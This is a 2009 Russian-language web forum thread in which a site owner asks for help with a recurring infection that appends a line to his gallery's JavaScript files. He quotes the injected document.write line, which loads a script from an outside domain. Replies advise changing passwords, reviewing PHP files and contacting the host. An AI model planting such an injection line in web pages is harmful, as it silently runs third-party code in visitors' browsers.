цепляется вирус к JavaScript'ам во всем сайте

Тема в разделе "Коммерческие", создана пользователем Flad.Solo, 29 окт 2009.

Информация :
Публиковать (для всех) нуленые версии, особенно от modulesgarden КАТЕГОРИЧЕСКИ не стоит. Тема мониторится оным разработчиком, а к нам приходят абузы которые нельзя игнорировать.
Статус темы:
Закрыта.
Модераторы: Amazko, Aste
  1. Flad.Solo

    Flad.Solo Создатель

    Регистр.:
    26 мар 2009
    Сообщения:
    26
    Симпатии:
    1
    в общем есть сайт, писался от руки
    сайт девушки фотографа (в общем портфолио)
    туда прикрутил галерею simpleviewer
    http://www.simpleviewer.net/simpleviewer/
    фо фри галерея распространяется без админки
    админку я нашел сам (svmanager называется)
    http://www.simpleviewer.net/svmanager/
    в чем штука
    сайт состоит из 4-х разделов (папок)
    и папки с svmanager'ом
    в папке Portfolio к index.php прикручена галерея simpleviewer
    там есть swfobject.js файл
    и еще около 10 *.js в папке с этой админкой svmanager
    буквально неделю тому начало приписывать ТОЛЬКО в *.js файлы такую дрянь
    *кстати, *.php iframe'ом не трогает вообще, только скрипты..
    Код:
    document.write('<script src=http://mi-travelservices.com/bliss/regal-haritage-city.shtml.php ><\/script>');
    что оно делает на сайте:
    когда клацаешь Portfolio браузер тупит секунды 2
    в строке загрузки виднеется искомый вирусный сайт
    а только потом открывается страничка Portfolio..
    скажу сразу, комп чистый (Аутпост + Касперский)
    что пробовал:
    -ставить 444 на скрипты
    -кодировать содержимое скрипта
    (в виде &&A.1s.E){5(4.j("P")){4.T("20","2r");4.l("H",4.1q)} и т.д)
    с помощью
    http://joliclic.free.fr/php/javascript-packer/en/index.php
    всеравно сцк приписывает каждую ночь
    причем в следущий раз уже второй строкой, потом третьей (одно и тоже)
    вопрос: (сразу извинюсь, не силен в JavaScripte)
    есть ли функция, которая скажет "КОНЕЦ ФАЙЛА"
    и все, что будет написано дальше - учитываться не будет?

    заранее прошу прощения если спросил какой-то баян
    тогда ткните носом где почитать о такой проблеме
    спасибо

    ах да, адрес сайта дам, кому интересно воочию глянуть про что я..
     
  2. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    Поменяй пароли и проверь пхп файлы.
    Возможно кто-то тупо заходит под фтп или под админкой и вручную правит файлы, а мб этот код прописан в пхп файле и записывается/выдается.
     
    Flad.Solo нравится это.
  3. Flad.Solo

    Flad.Solo Создатель

    Регистр.:
    26 мар 2009
    Сообщения:
    26
    Симпатии:
    1
    спасибо
    про смену паролей это да

    а пхп проверял
    заливал с бэкапа
    (файлы, сохраненные на компе после их написания)
    думаю это отпадает..

    а вот вопрос как сказать скрипту "окончиться" еще актуален)
     
  4. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    Такой функции нет, надо искоренять причину, а не замазывать последствия.
     
  5. Alexandr3

    Alexandr3

    Заблокирован
    Регистр.:
    22 апр 2008
    Сообщения:
    429
    Симпатии:
    96
    Смени пароли, напиши хостеру, могли через соседей прицепить и мониторь файлы по дате изменения, залитые с бекапа.
     
Статус темы:
Закрыта.